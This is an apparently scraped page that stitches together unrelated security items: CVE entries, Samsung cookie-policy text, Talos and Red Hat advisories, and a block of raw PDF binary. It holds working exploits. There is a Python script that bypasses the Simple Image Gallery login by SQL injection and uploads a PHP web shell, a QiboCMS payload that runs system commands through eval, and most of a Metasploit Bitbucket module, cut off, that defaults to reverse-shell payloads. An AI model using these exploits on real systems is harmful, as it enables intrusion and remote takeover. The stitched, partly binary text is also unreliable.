Improper authorization vulnerability in AutoPowerOnOffConfirmDialog in Settings prior to SMR Mar-2023 Release 1 allows local attacker to turn device off via unprotected activity.

This Cookie Policy describes the different types of cookies that may be used in connection with Samsung Mobile Security website which is owned and controlled by Samsung Electronics Co., Ltd (“Samsung Electronics”). This Cookie Policy also describes how you can manage cookies.

It’s important that you check back often for updates to the Policy as we may change it from time to time to reflect changes to our use of cookies. Please check the date at the top of this page to see when this Policy was last revised. Any changes to this Policy will become effective when we make the revised Policy available on our website.

Samsung Electronics has offices across Europe, so we can ensure that your request or query will be handled by the data protection team based in your region. If you have any questions, the easiest way to contact us is through our Privacy Support Page at https://www.samsung.com/request-desk.

You can also contact us at:

European Data Protection Officer  
Samsung Electronics (UK) Limited  
Samsung House, 2000 Hillswood Drive, Chertsey, Surrey KT16 0RS

**Cookies**

Cookies are small files that store information on your computer, TV, mobile phone, or other device. They enable the entity that put the cookie on your device to recognize you across different websites, services, devices, and/or browsing sessions.

We use the following types of cookies on this website:

**Essential Cookies**: enable you to receive the services you request via our website. Without these cookies, services that you have asked for cannot be provided. For example, these enable to identify users and provide proper service for each user. These cookies are automatically enabled and cannot be turned off because they are essential to enable you to browse our website. Without these cookies this Samsung Mobile Security website could not be provided.

Cookie

Domain

Purpose

JSESSIONID

security.samsungmobile.com

to keep login session

lastActivityTime

security.samsungmobile.com

to save the user's last activity time to automatically logout after 30 minutes of inactivity

**Managing Cookies and Other Technologies**

You can also update your browser settings at any time, if you want to remove or block cookies from your device (consult your browser's "help" menu to learn how to remove or block cookies). Samsung Electronics is not responsible for your browser settings. You can find good and simple instructions on how to manage cookies on the different types of web browsers at http://www.allaboutcookies.org.

CVE-2023-21461: Samsung Mobile Security

Improper access control vulnerability in BixbyTouch prior to version 3.2.02.5 in China models allows untrusted applications access local files.

CVE-2023-21465: Samsung Mobile Security

Due to JSON format limitations, the vulnerability only manifests itself as a remote denial of service in Ghost CMS, which crashes the Node.js process. However, the vulnerability could potentially lead to remote code execution in other products that use it.

Thursday, March 16, 2023 14:03

_Dave McDaniel of Cisco Talos discovered this vulnerability._

Cisco Talos recently discovered a vulnerability in node-sqlite3 that affects the Ghost content management system and could affect other software utilizing this library.

Ghost is a content management system with tools to build a website, publish content and send newsletters.

The node-sqlite3 library provides asynchronous, non-blocking SQLite3 bindings for Node.js. Ghost maintains the node-sqlite3 library and uses it in its CMS platform.

Talos identified a remote code execution vulnerability if an attacker sends the target a specially crafted JSON object. TALOS-2022-1645 (CVE-2022-43441) exists in the node-sqlite3 module, which provides asynchronous, non-blocking SQLite3 bindings for Node.js and could affect applications using the module.

Due to JSON format limitations, the vulnerability only manifests itself as a remote denial of service in Ghost CMS, which crashes the Node.js process. However, the vulnerability could potentially lead to remote code execution in other products that use it.

Cisco Talos worked with Ghost to ensure that this issue is resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update this affected product as soon as possible: Ghost Foundation node-sqlite3 5.1.1. Talos tested and confirmed this version of node-sqlite3 could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 60946. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Node-SQLite3 issue could lead to denial of service in Ghost CMS

Simple Image Gallery v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the username parameter.

    # Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
    # Date: 17.08.2021
    # Exploit Author: Tagoletta (Tağmaç)
    # Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
    # Version: V 1.0
    # Tested on: Ubuntu
    
    import requests
    import random
    import string
    import json
    from bs4 import BeautifulSoup
    
    url = input("TARGET = ")
    
    if not url.startswith('http://') and not url.startswith('https://'):
        url = "http://" + url
    if not url.endswith('/'):
        url = url + "/"
    
    payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
    
    session = requests.session()
    
    print("Login Bypass")
    
    request_url = url + "/classes/Login.php?f=login"
    post_data = {"username": "admin' or '1'='1'#", "password": ""}
    bypassUser = session.post(request_url, data=post_data)
    data = json.loads(bypassUser.text)
    status = data["status"]
    
    if status == "success":
    
        let = string.ascii_lowercase
    
        shellname = ''.join(random.choice(let) for i in range(15))
        shellname = 'Tago'+shellname+'Letta'
    
        print("shell name "+shellname)
    
        print("\nprotecting user")
        request_url = url + "?page=user"
        getHTML = session.get(request_url)
        getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    
        ids = getHTMLParser.find('input', {'name':'id'}).get("value")
        firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value")
        lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value")
        username = getHTMLParser.find('input', {'id':'username'}).get("value")
    
        print("\nUser ID : " + ids)
        print("Firsname : " + firstname)
        print("Lasname : " + lastname)
        print("Username : " + username + "\n")
    
        print("shell uploading")
    
        request_url = url + "/classes/Users.php?f=save"
        request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
        request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
        upload = session.post(request_url, headers=request_headers, data=request_data)
    
        if upload.text == "1":
            print("- OK -")
            req = session.get(url + "/?page=user")
            parser = BeautifulSoup(req.text, 'html.parser')
            find_shell = parser.find('img', {'id':'cimg'})
            print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
        else:
            print("- NO :( -")
    else:
        print("No bypass user")

CVE-2023-27040: Offensive Security’s Exploit Database Archive

The Request package through 2.88.2 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**Server-Side Request Forgery in Request**

Moderate severity GitHub Reviewed Published Mar 16, 2023 to the GitHub Advisory Database • Updated Mar 16, 2023

GHSA-p8p7-x288-28g6: Server-Side Request Forgery in Request

** UNSUPPORTED WHEN ASSIGNED ** The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

%PDF-1.3 %��������� 3 0 obj << /Filter /FlateDecode /Length 1549 >> stream x�WYoE~�\_Q� ������\`��Np R"V��!�r'A��\_�1۳��\]i{v��ί����tE\_�4�����Do��裢����9v��7Ӿ�|%�2�}9�B���9ݿOώN����!=:>� t�g)h+L����"y���T�iR�������O���>� 㜒e'\[��n�&��H<C�o��ʓgG�5�� ��QB9)y���� 09��;(ۑlݙ�HB;�"�\`��.�X��W4{!� � (�Eyy�l7��&��d\`\`0d�06�H.!�V���Xw��.���E�,�l��';�/;��#�ۢ��l��鲛�(��\]�I�B�}�:F�R8��'B)��Р�BLɔ�ug�;��x���j���z������$b��\\�p�<( �%�(��\`fJ!\*(�Wɹz!�t��\`�وI\`.� �U� {�$~�7�eX��%���k��ƽ�)�X�=)4�����x��\`�ɫ��K^���٘��a<\[� Ei�����|J'�͂�Ђp���WosY?<�\\^���?�"H��A�m� �\*iy�^I�\*���H�NNj�%y#�f��:�� j�Ŗ��ev|���T�,�qr�kP���裰�"�H�� x3>)�@�Q�Mp�>���l�P:�T�F��8K�sJ���\[SjKJ�=d�7�#0P�|-�6b�y;g��0���30�Z@�>� 5�����N�,7�5ڏɵ0S�����mˁ���\`O��9��{Ϫ�a+���nw9Å٥�2ר&�"Z����^�\\�ߩ�n�o�%�}ce6lf��!�U��@n�@�����.��\[�hg���-��\]��ro ��RS��B�EW�����CWsS��51�:�JF�4�:=�:����1RS�C?\`��p�6��P9�)�1�: PlR�0�����\_������ Գ�\[��7��u-�ȕA���Acm:%RhhRY�Ѵ��pR� ?0o����)4Z�����0Zǝ2hV��n���!�J<8p�\[HI��I�׃�xk�L�w�nb�;�߁�6�V��=�>���j\[�ؙd�5�+X}�im0R��)4�}���T�6-�i����b\]f\\\]fj��n���)�m������gQEy� 4�\]�"�(�h"�\]V�O�pc��l�R'�&g�����l�pR8w��+�����?�N��Ռo�c}9�8z�\_�U�F�1�R\`h\\�$�2c0�y�T�E!GпZa3�7GYG�8AQ�U�5�\[\[dU��\_�l��\`�����~����+����a� ۳����K}�~��Ktg���UH�-QsM��A�s4#v����tM����G�!���^�<8y�{�����'�t���ⲧ�z��d�dFgмѤ,�0�\`D��V��-lŔO.�lC���d��yo�\]�ב�

CVE-2023-28155

Qibosoft QiboCMS v7 was discovered to contain a remote code execution (RCE) vulnerability via the Get_Title function at label_set_rs.php

**qibo\_v7-Rce****label\_set\_rs.php**

    lobal $db,$pre,$timestamp,$webdb,$TB_url;
    	//分类的话,对于分表的情况,要特别处理,不支持其它频道调用,会出错
    	if($format[SYS]=='fenlei'&&!$rs[posttime]){
    		global $Fid_db;
    		$_erp=$Fid_db[tableid][$rs[fid]];		
    		$rs=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content$_erp WHERE id='$rs[id]' ");
    	}
    
    	//读取自定义字段的表,方便调用,如果声明了noReadMid就不要读了
    	if($format[wninfo]&&$rs[mid]&&!$format[noReadMid]){
    		$_rss=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content_{$rs[mid]} WHERE id='$rs[id]' ");
    		$_rss && $rs=$rs+$_rss;
    	//文章要读取自定义字段的表,方便调用
    	}elseif($format[SYS]=='artcile'&&$rs[mid]){
    		$_rss=$db->get_one("SELECT * FROM {$pre}article_content_{$rs[mid]} WHERE aid='$rs[aid]' ");
    		$_rss && $rs=$rs+$_rss;
    	}
    
    	//扩展接口,少用
    	if($format[eval_code]){
    
    		eval($format[eval_code]);
    
    	}
    

    $ format is the parameter parameter parameter parameter parameter parameter parameter parameter parameter that we pass in, $formati [eval_code] is a function when there is a value and a value.
    

    function Get_Title($format){
    	global $db,$webdb,$pre,$ModuleDB;
    	
    	//CMS万能文章专题里的文章
    
    	if($format['SYS']=='CMS'&&$format['ctype']=='special'){
    		return CMS_special($format);
    	}
    
    
    	//方便下面得到URL的真实列表地址
    	$page=1;
    	
    	if(strstr($format[sql],'$GLOBALS[')){
    		eval("\$format[sql]=\"$format[sql]\";");
    	}
    	if(strstr($format[sql2],'$GLOBALS[')){
    		eval("\$format[sql2]=\"$format[sql2]\";");
    	}
    	//此处屏障报错,主要是处理不同版本之间存在的一些差异性问题
    	$query=$db->query("$format[sql]",'','0');
    	if(!$query){
    		return ;
    	}
     
    	//辅助模板存在,并且辅助SQL存在的话,要读数据库
    	if($format[tplpart_2code]&&$format[sql2]){
    		$query2=$db->query($format[sql2],'','0');
    		$rs2=$db->fetch_array($query2);
    		$rs2=label_set_rs($format,$rs2);
    	}
    }
    

    Here $format[SYS] cannot be CMS and $format[sql] is a sql statement that can be executed accurately, and both $format[sql2] and $format[tplpart_2code] must be true, then you can enter label_set_rs and then enter js.php Get_Title is called in it.
    

**js.php**

    <?php
    error_reporting(0);extract($_GET);
    require_once(dirname(__FILE__)."/../data/config.php");
    if(!eregi("^([0-9]+)$",$id)){
    	die("document.write('ID不存在');");
    }
    $FileName=dirname(__FILE__)."/../cache/js/";
    
    $FileName.="{$id}.php";
    //默认缓存3分钟.
    if(!$webdb["cache_time_js"]){
    
    	$webdb["cache_time_js"]=3;
    }
    var_dump(!$webdb["cache_time_js"]);
    echo (time()-filemtime($FileName));
    
    
    if( (time()-filemtime($FileName))<($webdb["cache_time_js"]*60) ){
    	@include($FileName);
    	$show=str_replace(array("\n","\r","'"),array("","","\'"),stripslashes($show));
    	if($iframeID){	//框架方式不会拖慢主页面打开速度,推荐
    		//处理跨域问题
    		if($webdb[cookieDomain]){
    			echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
    		}
    		echo "<SCRIPT LANGUAGE=\"JavaScript\">
    		parent.document.getElementById('$iframeID').innerHTML='$show';
    		</SCRIPT>";
    	}else{			//JS式会拖慢主页面打开速度,不推荐
    		echo "document.write('$show');";
    	}
    	exit;
    }
    
    require(dirname(__FILE__)."/"."global.php");
    require_once(ROOT_PATH."inc/label_funcation.php");
    
    	$query=$db->query(" SELECT * FROM {$pre}label WHERE lid='$id' ");
    
    	while( $rs=$db->fetch_array($query) ){
    		//读数据库的标签
    		if( $rs[typesystem] )
    		{
                unserialize($rs['code']);
    			$_array=unserialize($rs[code]);
                var_dump($_array);
    			$value=($rs[type]=='special')?Get_sp($_array):Get_Title($_array);
    			if(strstr($value,"(/mv)")){
    				$value=get_label_mv($value);
    			}
    			if($_array[c_rolltype])
    			{
    				$value="<marquee direction='$_array[c_rolltype]' scrolldelay='1' scrollamount='1' onmouseout='if(document.all!=null){this.start()}' onmouseover='if(document.all!=null){this.stop()}' height='$_array[roll_height]'>$value</marquee>";
    			}
    		}
    

    First of all, the $id here is passed in through $_GET['id'] and must be a number. The id is spliced with the sql statement. When the data is queried, it will enter a loop, and then determine whether $rs[tyoesystem] is true. If it is true, it will enter the loop, and then deserialize $rs[code], and then $rs[type] here cannot be special, and then the array will be passed to Get_Title.
    

 Here we can upload a sql file, create a 1.sql, and write the following statement.

    
    update  qb_label set code='a:6:{s:13:"tplpart_1code";s:4:"test";s:13:"tplpart_2code";s:4:"test";s:3:"SYS";s:7:"artcile";s:9:"eval_code";s:17:"system("whoami");";s:3:"sql";s:24:"select * from qb_article";s:4:"sql2";b:1;}',typesystem=1,type='code' where lid=741;
    

    Then upload, the lid here can be blasted.
    then visit
    

 Use successfully.

CVE-2023-27037: vul/2023-01-14.md at main · dienamer/vul

Red Hat Security Advisory 2023-1277-01 - An update for openstack-swift is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (openstack-swift) security update  
Advisory ID:       RHSA-2023:1277-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1277  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-47950   
=====================================================================

1. Summary:

An update for openstack-swift is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

OpenStack Object Storage (swift) aggregates commodity servers to  
 work together in clusters for reliable, redundant, and large-scale storage  
of static objects. Objects are written to multiple hardware devices in the  
data center, with the OpenStack software responsible for ensuring data  
replication and integrity across the cluster. Storage clusters can scale  
horizontally by adding new nodes, which are automatically configured.  
Should a node fail, OpenStack works to replicate its content from other  
active nodes. Because OpenStack uses software logic to ensure data  
replication and distribution across different devices, inexpensive  
commodity hard drives and servers can be used in lieu of more expensive  
equipment.

Security Fix(es):

* Arbitrary file access through custom S3 XML entities (CVE-2022-47950)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2160618 - CVE-2022-47950 openstack-swift: Arbitrary file access through custom S3 XML entities

6. Package List:

Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server:

Source:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.src.rpm

noarch:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.src.rpm

noarch:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-swift-2.23.2-1.20230201163512.eef87ee.el8ost.src.rpm

noarch:  
openstack-swift-account-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-container-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-object-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-proxy-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
python3-swift-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-swift-2.23.4-2.20220422185313.2829195.el8ost.src.rpm

noarch:  
openstack-swift-account-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-container-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-object-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-proxy-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
python3-swift-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47950  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RdzjgjWX9erEAQhRMw/8DHDgTPCWS06Nt5uj0+gIeydc5aahFYkY  
IjAJP8/rGGYaqsWAFTVyoWS9Inq/lWILm7+by5tthqlMC9QxRj+ZBp4FTdu9Vett  
VIll9T4zhG6b2kB0UxqpXvcj55Izd7Mrhds7oaHrMCIWm5UP/ln5shdK6r9shUSt  
Nr7MsN8vtffnpTP/5mR8AIevmHFAXNsHZZetnQ1cWRbviTEUmPQV3CLKexbqHj3q  
pAYXWKPtcb+yKwg4TS7at/cS8LRuNB0SdzpFFtJHQh0zwOl+jOg6BxDQUInMIyvB  
siyDeWwqhn+scFCkjsJETJRLMbxNoYge9UvTtFmIgTq2S7XOazhZY2XS7LhNnYPL  
S7+9A37xi78tNR1gJ9iV0SMtiLzjZ9GfPanvecDujyTntEAr2uJ4rXv2Jfl+ampv  
LpltVyJ/MIwDhptHN/zBUKMa5gLUe0wPSxl2exd9yrAEpgY2bxP2grgog0c6mo3N  
kXFR4VDiBSMZOFBIaDfl19o3l2SlLEy23PUVWutr+nnXbWGKj8vhjCBq9dXNOIL9  
Vea+4QO/K7mXLDSrdNiz4qaejtXbcNbVcsT1lQe1FOO2t+BFLMIxMNlyl+TejHS3  
gJcpZ07lUgZxo4ai0Jv6xCAfjB5Pj7rZZtE8PkkyPO2uAZ7vg6cSqEGP933WT/ke  
gDn9JuNohT4=  
=9q28  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1277-01

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the atlbitbucket user by injecting the GIT_EXTERNAL_DIFF environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the GIT_EXTERNAL_DIFF environment variable will be run once the Bitbucket application is coerced into generating a diff. This Metasploit module requires at least admin credentials, as admins and above only have the option to change their user name.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Git  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Bitbucket Environment Variable RCE',        'Description' => %q{          For various versions of Bitbucket, there is an authenticated command injection          vulnerability that can be exploited by injecting environment          variables into a user name. This module achieves remote code execution          as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment          variable, a null character as a delimiter, and arbitrary code into a user's          user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable          will be run once the Bitbucket application is coerced into generating a diff.          This module requires at least admin credentials, as admins and above          only have the option to change their user name.        },        'License' => MSF_LICENSE,        'Author' => [          'Ry0taK', # Vulnerability Discovery          'y4er', # PoC and blog post          'Shelby Pace' # Metasploit Module        ],        'References' => [          [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],          [ 'CVE', '2022-43781']        ],        'Platform' => [ 'win', 'unix', 'linux' ],        'Privileged' => true,        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Linux Command',            {              'Platform' => 'unix',              'Type' => :unix_cmd,              'Arch' => [ ARCH_CMD ],              'Payload' => { 'Space' => 254 },              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'MaxLineChars' => 254,              'Type' => :linux_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => %i[wget curl],              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'MaxLineChars' => 254,              'Type' => :win_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => [ :psh_invokewebrequest ],              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-11-16',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Opt::RPORT(7990),        OptString.new('USERNAME', [ true, 'User name to log in with' ]),        OptString.new('PASSWORD', [ true, 'Password to log in with' ]),        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    return CheckCode::Unknown('Failed to retrieve a response from the target') unless res    return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')    nokogiri_data = res.get_html_document    footer = nokogiri_data&.at('footer')    return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer    version_info = footer.at('span')&.children&.text    return CheckCode::Detected('Failed to find version information in footer section') unless version_info    vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/)    return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1    version_str = vers_matches[1]    vprint_status("Found version #{version_str} of Bitbucket")    major, minor, revision = version_str.split('.')    rev_num = revision.to_i    case major    when '7'      case minor      when '0', '1', '2', '3', '4', '5'        return CheckCode::Appears      when '6'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 18      when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16'        return CheckCode::Appears      when '17'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 11      when '18', '19', '20'        return CheckCode::Appears      when '21'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 5      end    when '8'      print_status('Versions 8.* are vulnerable only if the mesh setting is disabled')      case minor      when '0'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '1'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '2'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 3      when '3'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 2      when '4'        return CheckCode::Appears if rev_num == 0 || rev_num == 1      end    end    CheckCode::Detected  end  def default_branch    @default_branch ||= Rex::Text.rand_text_alpha(5..9)  end  def uname_payload(cmd)    "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})"  end  def log_in(username, password)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),      'keep_cookies' => true,      'vars_post' => {        'j_username' => username,        'j_password' => password,        '_atl_remember_me' => 'on',        'submit' => 'Log in'      }    )    fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res    unless res.body.include?('Logged in')      fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')    end  end  def create_project    proj_uri = normalize_uri(target_uri.path, 'projects?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => proj_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project')    vprint_status('Retrieving security token')    html_doc = res.get_html_document    token_data = html_doc.at('div//input[@name="atl_token"]')    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data    @token = token_data['value']    fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?    project_name = Rex::Text.rand_text_alpha(5..9)    project_key = Rex::Text.rand_text_alpha(5..9).upcase    res = send_request_cgi(      'method' => 'POST',      'uri' => proj_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => project_name,        'key' => project_key,        'submit' => 'Create project',        'atl_token' => @token      }    )    fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res    fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)    print_status('Project creation was successful')    [ project_name, project_key ]  end  def create_repository    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => repo_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res    html_doc = res.get_html_document    dropdown_data = html_doc.at('li[@class="user-dropdown"]')    fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?    email = dropdown_data&.at('span')&.[]('data-emailaddress')    fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?    repo_name = Rex::Text.rand_text_alpha(5..9)    res = send_request_cgi(      'method' => 'POST',      'uri' => repo_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => repo_name,        'defaultBranchId' => default_branch,        'description' => '',        'scmId' => 'git',        'forkable' => 'false',        'atl_token' => @token,        'submit' => 'Create repository'      }    )    fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse')    )    fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404    print_good("Successfully created repository '#{repo_name}'")    [ email, repo_name ]  end  def generate_repo_objects(email, repo_file_data = [], parent_object = nil)    txt_data = Rex::Text.rand_text_alpha(5..20)    blob_object = GitObject.build_blob_object(txt_data)    file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"    file_data = {      mode: '100755',      file_name: file_name,      sha1: blob_object.sha1    }    tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ])    tree_obj = GitObject.build_tree_object(tree_data)    commit_obj = GitObject.build_commit_object({      tree_sha1: tree_obj.sha1,      email: email,      message: Rex::Text.rand_text_alpha(4..30),      parent_sha1: (parent_object.nil? ? nil : parent_object.sha1)    })    {      objects: [ commit_obj, tree_obj, blob_object ],      file_data: file_data    }  end  # create two files in two separate commits in order  # to view a diff and get code execution  def create_commits(email)    init_objects = generate_repo_objects(email)    commit_obj = init_objects[:objects].first    refs = {      'HEAD' => "refs/heads/#{default_branch}",      "refs/heads/#{default_branch}" => commit_obj.sha1    }    final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj)    repo_objects = final_objects[:objects] + init_objects[:objects]    new_commit = final_objects[:objects].first    new_file = final_objects[:file_data][:file_name]    git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")    res = send_receive_pack_request(      git_uri,      refs['HEAD'],      repo_objects,      '0' * 40 # no commits should exist yet, so no branch tip in repo yet    )    fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res    fail_with(Failure::UnexpectedReply, 